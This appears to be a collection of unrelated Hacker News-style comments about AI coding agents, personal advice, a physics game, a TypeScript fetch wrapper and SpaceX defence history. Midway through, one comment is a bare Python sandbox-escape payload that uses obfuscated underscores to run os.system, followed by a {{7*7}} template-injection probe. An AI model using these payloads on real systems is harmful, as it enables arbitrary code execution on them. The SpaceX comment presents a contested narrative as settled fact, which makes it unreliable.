
I'm MUCH older than you. I definitely don't have life all figured out, but I have the benefit of many years of experience and mistakes (and a few small successes).

The MOST IMPORTANT thing that matters long term of all the things you have listed is your health.

Physical, mental, emotional.

Based on your description of things and my interpretation thereof: You are working too hard and playing too hard. And stressed that you're not working harder and playing harder. Chill, bro. Pull back. Something's got to give. If you don't choose what to pull back on, your body is going to choose for you.

I know what you mean about the last couple of things you've said. I too have had to truncate long streaks of working out because of injuries or health problems. Do what you can. You don't need to push yourself unnecessarily; just literally do what you can. If you're not "back to your old self" just yet, don't try to force it. The idea is to do better -- not to be perfect.

And for crying out loud, spend some time away from screens. Go outside (it's a cliche because it's true), take walks, look at birds, read a book for fun, maybe meditate. (Sometimes you have to focus on nothing before you can focus on anything.) If you don't have the time for it? Make the time for it. The emails and the business will wait. The girlfriend, if she's at all decent, will wait. And your schoolwork won't suffer.

One of the big follies of college is putting an immense amount of pressure on teenagers. Putting that kind of pressure on yourself is a recipe for mishaps and mistakes. It's okay to take that pressure off of yourself. Twenty years from now you will not look back and regret not being able to do it all perfectly -- but you are at risk of regretting not focusing more on one thing and less on another.

And you'll definitely regret letting your health suffer if you don't take care of yourself.

If these ideas make the high-achiever part of you feel guilty or otherwise bad, consider: It's one thing if you're working hard for a particular goal and you're making a short-term sacrifice in service of that long-term payoff. But everything you're doing is so all over the place, it all seems long-term, and nothing you've said indicates that you even have a clearly defined goal. Until you have a clearly defined goal, you are subjecting yourself to noise.

Of course, you're 18. If you don't 100% know what your goals are right now, that's okay. And you're bound to err. And you're bound to make a wrong turn and have to correct. That's fine. That's normal. That's expected. Part of being 18 is figuring out your goals.

That means putting yourself in a place where you can mindfully explore and figure things out. And you can't do that well without taking good care of yourself. Take care of yourself like someone you are responsible for caring for. If you wouldn't let your son or your daughter or your pet go through a particular kind of strife, don't allow it for yourself.

Be well.


Voyager is proof that when requirements are stable and systems are simple, longevity follows. We rarely get that luxury today.

I'll give you my personal experience. I use it for everything: design, coding, testing, deploying to a Kubernetes cluster, fixing issues on the cluster. I use it not only for dev-env issues but for production issues. Confidently. Have things gone wrong? Sure. But mistakes have been rare (and catastrophic mistakes -- non-recoverable ones -- even rarer).

Every time a mistake has happened, on digging in I could always trace it back to something I did wrong: either being careless in reading what it told me, or careless in telling it what I want. I have had git code-corruption issues; it overwrote uncommitted working code with non-working code. But it was my mistake not to tell it to commit the code before making changes. It deleted a QA cluster database, but only because I told it to delete it, thinking it was my dev setup's DB. Net net: its mistakes are more a reflection of me as its supervisor than anything else.


the pre-cog angle is the scariest part. it's not even that they copy you afterward; the prompt patterns across millions of users already signal where demand is clustering before any individual ships. the only real counter is speed and distribution: get to users before the signal becomes obvious enough to act on. which ironically means building in public is still the better strategy; hiding slows you down more than it protects you.

the final recursion point is the most honest part: you can't warn about the forest without feeding it. but i'd push back slightly on the inevitability. the forest needs novelty to absorb, which means the edge always exists; it just keeps moving. the question isn't whether to hide but whether the speed of individual innovation can outpace the speed of absorption. so far it still can, barely.

anyone who touches this topic on HN gets flagged/banned, so they're probably trying to avoid that

interesting approach building this in rust; the latency argument makes sense for something sitting inline with every LLM request. curious how it handles multi-turn context, where injection might be spread across messages rather than a single prompt.

I also have a solution, mostly for myself, but others are welcome to it: https://zieka.github.io/bru/

Outlined some differences here between the various projects; might be useful: https://github.com/zieka/bru?tab=readme-ov-file#how-bru-comp...


Ok I contest. If you are worried about it resetting its own work, then yes. Although just chuck the same prompt at it and you should get a similar result, amirite? Maybe a better one lol!

Also you can instruct it to commit and push at every step too.


Basically turning an LLM into a personal CliffsNotes machine. Genius way to justify buying more books while still feeling productive.

Play it in your browser: http://sean-reid.github.io/gravity

Technical blog post: https://sean-reid.github.io/blog/gravity.html

The idea: you're fighting near black holes, and Schwarzschild time dilation is the core mechanic. Get close to a well and the universe outside speeds up relative to you. Enemies move faster, projectiles zip past, weapons cycle quicker. Pull back out and everything normalizes. Single and binary black hole configurations make things pretty chaotic. Weapons and AI scale with local dilation, and there's procedural audio that shifts based on how deep you are in a gravity well. It's free, runs on Windows/macOS/Linux/web.
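The core formula behind that mechanic is the Schwarzschild dilation factor. A quick sketch in TypeScript -- the function and variable names here are mine for illustration, not the game's actual code:

```typescript
// Schwarzschild time-dilation factor: how fast your clock runs relative
// to a far-away observer. rs is the Schwarzschild radius of the well,
// r is your distance from its center (same arbitrary game units).
function dilationFactor(r: number, rs: number): number {
  if (r <= rs) return 0; // at/inside the horizon: your clock stops relative to outside
  return Math.sqrt(1 - rs / r);
}

// Deep in a well your clock runs slow, so the outside universe (enemies,
// projectiles, weapon cycles) appears sped up by 1 / factor.
const nearWell = dilationFactor(1.25, 1.0); // sqrt(0.2) ~ 0.447: outside runs ~2.2x faster
const farAway = dilationFactor(100, 1.0);   // ~0.995: nearly normal time
```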

Built the whole thing solo: physics, AI, procedural audio, rendering, deployment. Happy to talk about any of the technical choices.


Idk if it matters that much for you, but you can look into the code and see if it's typical AI code or not.

Was ChatGPT hyped?

It took off rapidly but that was hardly because of any hyping and almost entirely due to word of mouth and people actually liking the product, until the press picked up on it.

From what I remember they still had an invite process when they were getting popular and the demand clearly overwhelmed their servers several times, indicating a much bigger response than they expected. If anything I think OpenAI was downplaying the product at the time.


Have you read Mike Masnick's piece? https://www.techdirt.com/2026/03/25/ai-might-be-our-best-sho...

It actually argues the complete opposite, and I liked that quite a bit: that AI allows us to get back the open web in a way.


eval('[c._﹍init﹍_._﹍globals﹍_["os"].system("id") for c in ()._﹍class﹍_._﹍bases﹍_[0]._﹍subclasses﹍_() if c._﹍init﹍_._﹍class﹍_._﹍name﹍_ == "function" and "os" in c._﹍init﹍_._﹍globals﹍_]'.replace('__', ''), {'__builtins__': None}, {})

{{7*7}}

1


I built a thin wrapper over the Fetch API that returns errors as values instead of throwing. Inspired by Go's result, err pattern.

No try/catch. TypeScript narrows the error type so you know exactly which HTTP errors to handle at compile time. 40 typed error classes for all standard status codes, plus a separate NetworkError for connection failures.

Would love feedback on the API design.
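For anyone skimming, the shape of the pattern is roughly this -- note that `safeFetch`, `HttpError`, and `NetworkError` here are illustrative names, not the library's actual exports:

```typescript
// Errors-as-values wrapper over fetch: HTTP and network failures come
// back as values instead of being thrown.
class HttpError extends Error {
  constructor(public status: number, message: string) { super(message); }
}
class NetworkError extends Error {}

type FetchResult =
  | { data: Response; error: null }
  | { data: null; error: HttpError | NetworkError };

async function safeFetch(url: string, init?: RequestInit): Promise<FetchResult> {
  try {
    const res = await fetch(url, init);
    if (!res.ok) {
      // HTTP-level failure becomes a value, not a throw
      return { data: null, error: new HttpError(res.status, res.statusText) };
    }
    return { data: res, error: null };
  } catch (e) {
    // fetch itself only throws on connection-level failures
    return { data: null, error: new NetworkError(String(e)) };
  }
}

// Call sites branch on the error value instead of wrapping in try/catch:
// const { data, error } = await safeFetch("https://api.example.com/user");
// if (error instanceof HttpError && error.status === 404) { /* handle */ }
```

With one class per status code instead of a single `HttpError`, TypeScript can narrow a union to the exact errors a call can produce, which is presumably what the 40 typed classes buy you.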



A genuine Mars program requires a dozen things SpaceX has only built CGI renders of or has totally overlooked. Instead, they focused on reusable launch and building a low-Earth-orbit mega-constellation. This dates back to the 1980s Strategic Defense Initiative (SDI). Michael D. Griffin architected Brilliant Pebbles, a concept for thousands of LEO missile interceptors in orbit that died because launch costs were too high. The Pentagon attempted to solve the launch-cost problem in the 1990s with the DC-X reusable rocket program, but it was canceled. The architectural dream survived through "New Space" advocacy. In 2001, this very same Griffin shared a Mars Society stage with Elon Musk, then flew with him to Russia in 2002 to buy ICBMs. SpaceX was conceived on the flight home. Musk later told the former DC-X program manager, Jess Sponable, that SpaceX was "just continuing the great work of the DC-X project."

While Musk built rockets, Griffin ran In-Q-Tel, the CIA's venture arm. Then as NASA Administrator, Griffin used his In-Q-Tel playbook to award the commercial cargo contracts that saved SpaceX from bankruptcy.

SpaceX's masking began to slip when Gwynne Shotwell publicly confirmed the company's willingness to launch offensive weapons in 2018. That same year, Griffin returned to the Pentagon to establish the Space Development Agency, mandated to build a proliferated LEO constellation for hypersonic missile tracking. In 2019, U.S. General Terrence O'Shaughnessy pitched the Senate on "SHIELD", a layered orbital missile defense system. Shortly after, O'Shaughnessy retired from the military and joined SpaceX to lead their discreet new division: Starshield.

Three decades later, Brilliant Pebbles is finally materializing as Golden Dome. As Reuters reported, Musk's Starshield is the frontrunner to build this classified SDI successor, pitching the Pentagon on a Golden Dome architecture involving thousands of weapon satellites. Starshield is already deploying these military satellites alongside standard Starlink satellites.

Mars was the necessary myth to recruit talent, capture public imagination, and secure capital. But the capabilities SpaceX actually delivered, cheap mass-to-orbit and rapid satellite replenishment, are the exact prerequisites of Golden Dome.


Pretty rude remark. And what makes you think that ASI is _just on the horizon_?

It's really disappointing news. I've been actively using Sora for my video production.

Feels like a lot of people are still treating these tools like “smart scripts” instead of systems with failure modes.

Telling it not to do something is basically just nudging probabilities. If the action is available, it’s always somewhere in the distribution.

Which is why the boundary has to be outside the model, not inside the prompt.
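A minimal sketch of what "outside the model" means in practice. The names here (`ToolCall`, `authorize`, the allowlist contents) are illustrative, not any particular framework's API:

```typescript
// The model can *propose* any tool call; a hard-coded policy outside the
// model decides what actually runs. The check executes regardless of
// what the prompt said or how the model was nudged.
interface ToolCall { tool: string; args: Record<string, string> }

const ALLOWED_TOOLS = new Set(["read_file", "search", "list_dir"]);

function authorize(call: ToolCall): { ok: boolean; reason?: string } {
  if (!ALLOWED_TOOLS.has(call.tool)) {
    // deny-by-default beats "please don't do X" in the system prompt
    return { ok: false, reason: `tool ${call.tool} is not allowlisted` };
  }
  return { ok: true };
}
```

The point is that "don't delete the database" lives in code that always runs, not in a prompt that only shifts probabilities.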


Or just train some NNs. If you have more time, write the code and understand the tensor operations.

I think this also explains why the checks are moving up the stack.

If the real cost is in actually running the app or the model, then just verifying a browser isn’t enough anymore. You need to verify that the expensive part actually happened.

Otherwise you’re basically protecting the cheapest layer while the expensive one is still exposed.


Sounds like you care about data stored on your filesystem! Take one step back and solve that problem. Use a proper isolated sandbox, e.g. a GitHub workspace on an account that is working with a fork.

Care about the data in that workspace? Push it first.

Otherwise it is a cat-and-mouse game of whack-a-mole.


This is coming straight from my experience last week. I actually tried to test this: took 30 days of my Claude Code sessions, about 32k conversation turns across 21 sessions and 10 projects. Classified every user message -- corrections, feedback, decisions, reframes -- and extracted about 3,200 high-signal training pairs. I put a lot of emphasis on my explicit corrections, where I told the AI it was wrong and what the right answer was and WHY. Fine-tuned Qwen 4B on it with QLoRA. The model learned my voice perfectly; during training it would say things like 'no. fix the query. you're doing 3 joins when you only need user_id', which is exactly how I talk. But that's the problem: it learned to parrot my phrasing without understanding why I made those corrections. It memorized the what, the artifact, but completely missed the how, the reasoning process that led to the correction. Title is exactly right.

I'm with you on CDK or Pulumi. Being able to use programming languages for infra makes composition better. But the main issue is that they still rely on the same execution model: define intent, generate a plan, apply, and then the process exits. The system doesn't stay "alive" after that. If something drifts, partially fails, or never fully converges, you're back to fixing it manually. With Planetform, the idea is a shift to Durable Execution (IaDE). It's less about how we define infra and more about making the system itself responsible for staying correct over time. Monitoring then becomes part of that verification loop, not something you wire in after the fact. This is the first of a couple of posts we'll be releasing on how we think about solving this. The project will be fully open source.
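A rough sketch of the difference, where every name (`DesiredState`, `observe`, `converge`) is illustrative rather than Planetform's actual API: plan/apply runs once and exits, while a durable executor keeps running something like this on a timer:

```typescript
// One tick of a reconcile loop: compare desired vs. observed state and
// re-converge on drift, instead of waiting for a human to re-run apply.
interface DesiredState { replicas: number }

function reconcileOnce(
  desired: DesiredState,
  observe: () => DesiredState,         // query the real system
  converge: (d: DesiredState) => void, // push it back toward desired
): boolean {
  const actual = observe();
  if (actual.replicas !== desired.replicas) {
    converge(desired); // drift detected: repair it now
    return true;
  }
  return false; // already converged this tick
}

// The "stays alive" part is just: call reconcileOnce forever, on a timer
// or on change events, rather than exiting after one apply.
```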

Highly recommend denying commands like git reset in your user settings.json.
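For Claude Code that looks roughly like this (the exact matcher syntax may vary between versions, so treat this as a sketch and check the permissions docs):

```json
{
  "permissions": {
    "deny": [
      "Bash(git reset:*)",
      "Bash(git push --force:*)",
      "Bash(rm -rf:*)"
    ]
  }
}
```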
